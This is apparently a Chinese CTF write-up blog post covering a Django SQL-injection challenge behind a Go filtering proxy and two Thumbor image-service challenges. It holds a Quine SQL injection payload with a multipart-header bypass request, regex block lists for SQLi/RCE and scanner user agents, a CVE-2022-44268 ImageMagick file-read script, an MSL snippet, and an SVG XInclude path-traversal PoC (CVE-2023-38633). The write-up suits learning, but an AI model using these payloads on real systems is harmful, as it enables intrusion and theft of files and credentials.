    password = request.POST.get('password')
    users:AdminUser = AdminUser.objects.raw("SELECT * FROM blog_adminuser WHERE username='%s' and password ='%s'" % (username,password))
    try:
        assert password == users[0].password
        return HttpResponse(os.environ.get('FLAG'))
    except:
        return HttpResponse('wrong password')

flag/路由实现登录admin用户即可得到flag，其中存在sql语句，可尝试sql注入。

但其后端存在一个反向代理服务，会进行监测，防范sql注入、rec攻击和sqlmap、nmap扫描等操作。(main.go)

  
const backendURL = "http://127.0.0.1:8000"
const backendHost = "127.0.0.1:8000"

var blockedIPs = map[string]bool{
    "1.1.1.1": true,
}

var sqlInjectionPattern = regexp.MustCompile(`(?i)(union.*select|select.*from|insert.*into|update.*set|delete.*from|drop\s+table|--|#|\*\/|\/\*)`)

var rcePattern = regexp.MustCompile(`(?i)(\b(?:os|exec|system|eval|passthru|shell_exec|phpinfo|popen|proc_open|pcntl_exec|assert)\s*\(.+\))`)

var hotfixPattern = regexp.MustCompile(`(?i)(select)`)

var blockedUserAgents = []string{
    "sqlmap",
    "nmap",
    "curl",
}

思路

Quine 注入，union 查询的结果会再次进行比对
1. https://blog.csdn.net/qq_73767109/article/details/130350848
2. https://www.anquanke.com/post/id/253570
3. DUCTF - sqli2022 challenge (web)

先构造出 Quine 注入的 payload，再考虑绕过

  
 'union select 1,2,REPLACE(REPLACE('"union select 1,2,REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")--',CHAR(34),CHAR(39)),CHAR(46),'"union select 1,2,REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")--')--

考虑 golang 与 django 之间 http 处理差异。

 POST /flag/ HTTP/1.1
 Host: 1.95.159.113
 sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Windows"
 Accept-Language: zh-CN,zh;q=0.9
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Sec-Fetch-Site: none
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Accept-Encoding: gzip, deflate, br
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
 Connection: keep-alive
 Content-Length: 451

 ------WebKitFormBoundary7MA4YWxkTrZu0gW
 Content-Disposition: form-data; name="username"

 admin
 ------WebKitFormBoundary7MA4YWxkTrZu0gW
 Content-Disposition: form-data111; name="password"

 'union select 1,2,REPLACE(REPLACE('"union select 1,2,REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")--',CHAR(34),CHAR(39)),CHAR(46),'"union select 1,2,REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")--')--
 ------WebKitFormBoundary7MA4YWxkTrZu0gW--

thumbor 1

启动命令：

  
/bin/sh -c thumbor --port 8800 --conf=thumbor.conf -a wikimedia_thumbor.app.App

thumbor 是一个图像处理服务，开源产品

thumbor 的官方文档：

Configuration — Thumbor 7.7.4 documentation

thumbor 的基本使用方式：

http://[服务器地址]:[端口]/thumbor/unsafe/[处理参数]/[图片URL]
http://192.168.85.128:8800/thumbor/unsafe/450x/Carrie.jpg

源码中可以定位路由位置：

wikimedia_thumbor/handler
发现一个命令执行的功能 wikimedia_thumbor/shell_runner

思路

Flag 在根目录
挖掘 thumbor 框架的漏洞，python 框架
ImageMagick 6.9.10-23 的漏洞？
官方文档有提到安全性：Security — Thumbor 7.7.4 documentation 好像没什么用

确认 CVE-2022-44268 可用性：

  
#!/bin/bash
if [ -z "$1" ]; then
    file="/etc/passwd"
else
    file="$1"
fi
pngcrush -text a "profile" "$file" ctf.png 
exiv2 -pS pngout.png 
convert pngout.png gopro.png 
identify -verbose gopro.png | grep -e "^[0-9a-f]*$" |  grep . | xxd -r -p

thumbor 2

thumbor2 中原 poc 已经失效，至少 ImageMagic CVE 无法利用了。

似乎引入了 pandoc 依赖，但 ImageMagic 版本没变，少了 heic、jp2 组件。

  
# thumbor1
Version: ImageMagick 6.9.10-23 Q16 x86_64 20190101 https://imagemagick.org
Copyright: © 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP 
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

# thumbor2
Version: ImageMagick 6.9.10-23 Q16 x86_64 20190101 https://imagemagick.org
Copyright: © 1999-2019 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP 
Delegates (built-in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

thumbor 中没有找到任何调用 pandoc 的地方。检查了 policy 安全策略也是一致的：

identify -list policy

思路

挖掘 thumbor 本身的漏洞
1. thumbor/thumbor: thumbor is an open-source photo thumbnail service by globo.com
挖掘 wikimedia_thumbor 的漏洞
1. 参考
  1. operations/software/thumbor-plugins - Gitiles
  2. Thumbor - Wikitech
2. wikimedia_thumbor 是为了解决 thumbor 不支持大文件传输的问题，其文件类型的检测是通过 thumbor 框架完成的。
寻找与 pandoc 相关的利用？感觉没有任何调用点

ImageMagic 其他利用方式，可以在 github issue 中找一找

Msl 脚本文件利用？但 thumbor 在处理的时候似乎没法直接注入参数，文件名不可控。wikimedia-thumbor 中也没有直接处理 msl 文件的地方。

  
 convert msl:msl.msl null:

 # msl.msl
 <?xml version="1.0" encoding="UTF-8"?>
 <msl>
   <image size="100x100">
     <read filename="mvg:/flag" />
     <write filename="/tmp/xxxx" />
   </image>
 </msl>

Svg 文件的利用？svg 可以包含 msl，但 wikimedia-thumbor 使用 rsvg-convert 进行处理，不是 ImageMagick。再找找别的文件格式？
CVE-2023-34152 貌似是个误报
1. RCE (shell command injection) vulnerability in \OpenBlob\ with --enable-pipes\ configured · Issue #6339 · ImageMagick/ImageMagick
Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities，但是题目环境默认禁止了 Ghostscript
1. potential exploit through ghost script in image magick · Issue #1262 · ImageMagick/ImageMagick
CVE-2023-34153 video 参数注入，需要可控参数，还需要尝试一下
1. Shell command injection vulnerability via `video:vsync` or `video:pixel-format` options in VIDEO encoding/decoding. · Issue #6338 · ImageMagick/ImageMagick
CVE-2021-3781，Ghostscript 中的一个 RCE，刚好就是 6.9.10-23，Ghostscript 9.54 修复，目标为 9.50，但是好像又提到 Ubuntu 20.04 的 9.50~dfsg-5ubuntu4.3 中已修复。本地测试确实不行。
1. Security: shell escape using ghostscript · Issue #4172 · ImageMagick/ImageMagick
2. duc-nt/RCE-0-day-for-GhostScript-9.50: RCE 0-day for GhostScript 9.50 - Payload generator
UAF？？？
1. heap-use-after-free in magick at dcm.c RelinquishDCMInfo · Issue #4947 · ImageMagick/ImageMagick

Ffmpeg 利用
1. [USN-6803-1: FFmpeg vulnerabilities Ubuntu security notices Ubuntu](https://ubuntu.com/security/notices/USN-6803-1)
ExifTool 利用，目标版本是 11.88，似乎在适用版本内，但利用不成功
1. UNICORDev/exploit-CVE-2021-22204: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
Ghostscript 利用
1. CVE-2024-29510，需要 -dSAFER 参数，目标似乎满足条件，测试完了，发现漏洞不存在。ghostscript -q -dNODISPLAY -dBATCH -dSAFER CVE-2024-29510_testkit.ps
  1. Attackers Exploiting Remote Code Execution Vulnerability in Ghostscript - SecurityWeek
  2. CVE-2024-29510 - Exploiting Ghostscript using format strings — Codean Labs，文中提到：也可能是您的发行版提供的版本太旧（< v9.50），因此也不容易受到此 CVE 的影响。
Rsvg-convert 利用
1. [CVE-2023-38633 Common Vulnerabilities and Exposures SUSE](https://www.suse.com/security/cve/CVE-2023-38633.html)
2. When URL parsers disagree (CVE-2023-38633) - Canva Engineering Blog

最终 poc：

  
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,204,204);" />
  <text x="0" y="100">
    <xi:include
      href=".?../../../../../../../flag"
      parse="text"
      encoding="ASCII"
    >
      <xi:fallback>file not found</xi:fallback>
    </xi:include>
  </text>
</svg>

CTF

This post is licensed under CC BY 4.0 by the author.